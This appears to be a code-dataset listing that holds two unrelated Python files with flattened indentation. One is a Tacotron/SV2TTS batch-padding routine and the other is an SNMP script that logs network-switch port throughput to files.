targets_lengths = np.asarray([x[-1] for x in batches], dtype=np.int32) # Used to mask loss
input_lengths = np.asarray([len(x[0]) for x in batches], dtype=np.int32)
for i in range(self._hparams.tacotron_num_gpus):
batch = batches[size_per_device * i:size_per_device * (i + 1)]
input_cur_device, input_max_len = self._prepare_inputs([x[0] for x in batch])
inputs = np.concatenate((inputs, input_cur_device), axis=1) if inputs is not None else input_cur_device
mel_target_cur_device, mel_target_max_len = self._prepare_targets([x[1] for x in batch], outputs_per_step)
mel_targets = np.concatenate((mel_targets, mel_target_cur_device),
axis=1) if mel_targets is not None else mel_target_cur_device
# Pad sequences with 1 to infer that the sequence is done
token_target_cur_device, token_target_max_len = self._prepare_token_targets([x[2] for x in batch],
outputs_per_step)
token_targets = np.concatenate((token_targets, token_target_cur_device),
axis=1) if token_targets is not None else token_target_cur_device
split_infos.append([input_max_len, mel_target_max_len, token_target_max_len])
split_infos = np.asarray(split_infos, dtype=np.int32)
### SV2TTS ###
embed_targets = np.asarray([x[3] for x in batches])
##############
return inputs, input_lengths, mel_targets, token_targets, targets_lengths, \
split_infos, embed_targets
def _prepare_inputs(self, inputs):
max_len = max([len(x) for x in inputs])
return np.stack([self._pad_input(x, max_len) for x in inputs]), max_len
def _prepare_targets(self, targets, alignment):
max_len = max([len(t) for t in targets])
data_len = self._round_up(max_len, alignment)
return np.stack([self._pad_target(t, data_len) for t in targets]), data_len
def _prepare_token_targets(self, targets, alignment):
max_len = max([len(t) for t in targets]) + 1
data_len = self._round_up(max_len, alignment)
return np.stack([self._pad_token_target(t, data_len) for t in targets]), data_len
def _pad_input(self, x, length):
return np.pad(x, (0, length - x.shape[0]), mode="constant", constant_values=self._pad)
def _pad_target(self, t, length):
return np.pad(t, [(0, length - t.shape[0]), (0, 0)], mode="constant", constant_values=self._target_pad)
def _pad_token_target(self, t, length):
return np.pad(t, (0, length - t.shape[0]), mode="constant", constant_values=self._token_pad)
def _round_up(self, x, multiple):
remainder = x % multiple
return x if remainder == 0 else x + multiple - remainder
def _round_down(self, x, multiple):
remainder = x % multiple
return x if remainder == 0 else x - remainder
|
collect.py | from time import sleep, clock
import simplejson as json
from easysnmp import snmp_get
import threading
import os
import datetime
DELAY = 1 # seconds
switches = {}
ifSpeed32 = "1.3.6.1.2.1.2.2.1.5"
inOctets32 = "1.3.6.1.2.1.2.2.1.10"
outOctets32 = "1.3.6.1.2.1.2.2.1.16"
ifSpeed64 = "1.3.6.1.2.1.31.1.1.1.15"
inOctets64 = "1.3.6.1.2.1.31.1.1.1.6"
outOctets64 = "1.3.6.1.2.1.31.1.1.1.10"
def getData(ip, port): # returns speed, in, out
data = {}
data["speed"] = int(snmp_get(ifSpeed64 + "." + port, hostname=ip, community='cacti', version=2).value)
data["in"] = int(snmp_get(inOctets64 + "." + port, hostname=ip, community='cacti', version=2).value)
data["out"] = int(snmp_get(outOctets64 + "." + port, hostname=ip, community='cacti', version=2).value)
return data
def snmpthread(ip, pt, reverse): # Switch IP, port, reversed?
while 1:
time = 15 # seconds
b = getData(ip, str(pt))
sleep(time)
e = getData(ip, str(pt))
speed = b["speed"]
if speed != 0:
in2 = (e["in"] - b["in"]) / time * 8 / 1024 / 1024 # Mb/s
out2 = (e["out"] - b["out"]) / time * 8 / 1024 / 1024 # Mb/s
else:
in2 = 0
out2 = 0
now = datetime.datetime.now()
try:
datafile = open("/opt/stat/data/high/{}-{}-{}:{}-{}".format(now.month, now.day, now.year, ip, pt), "a+")
if reverse:
datafile.write("{0:02}:{1:02}:{2:02},{3:.4f},{4:.4f},{5:.4f}\n".format(now.hour, now.minute, now.second, round(out2,6), round(in2,6), speed))
else:
datafile.write("{0:02}:{1:02}:{2:02},{3:.4f},{4:.4f},{5:.4f}\n".format(now.hour, now.minute, now.second, round(in2,6), round(out2,6), speed))
except Exception as e:
print("Error creating log files, {}".format(e))
#####
# main program code
try:
if not os.path.exists(os.path.dirname("/opt/stat/data/")): # trailing slash is IMPORTANT
os.makedirs(os.path.dirname("/opt/stat/data/"))
except Exception as e:
print ("Error creating data logging directory for network statistics")
exit(0)
try:
if not os.path.exists(os.path.dirname("/opt/stat/data/high/")):
os.makedirs(os.path.dirname("/opt/stat/data/high/"))
except:
print ("Error creating high-resolution data logging directory for network statistics")
exit(0)
try:
file = open("switch.conf", 'r')
i = 1
for line in file:
try:
sub = line.split(":")
i+=1
data = {}
name = sub[0] # name of switch
data["ip"] = sub[1] # IP in IPv4 format
data["ports"] = int(sub[2]) # Number of ports on switch
data["rdir"] = sub[3] # ports on switch which are switch centric, seperated by commas
switches[name] = data
# Example:
# swm1:1.2.3.4:24:1
except:
print("Error on line {} in switch file".format(i))
except:
print("Error, you need a switch configuration file")
exit(0)
for switch in switches:
for port in range(1,switches[switch]["ports"]+1):
if str(port) in switches[switch]["rdir"].split(","):
#print("Switch: {} Port: {} Reversed".format(switch, port))
collect = threading.Thread(target=snmpthread, args=(switches[switch]["ip"], port, True))
collect.start()
else:
#print("Switch: {} Port: {} Normal".format(switch, port))
collect = threading.Thread(target=snmpthread, args=(switches[switch]["ip"], port, False))
collect.start()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.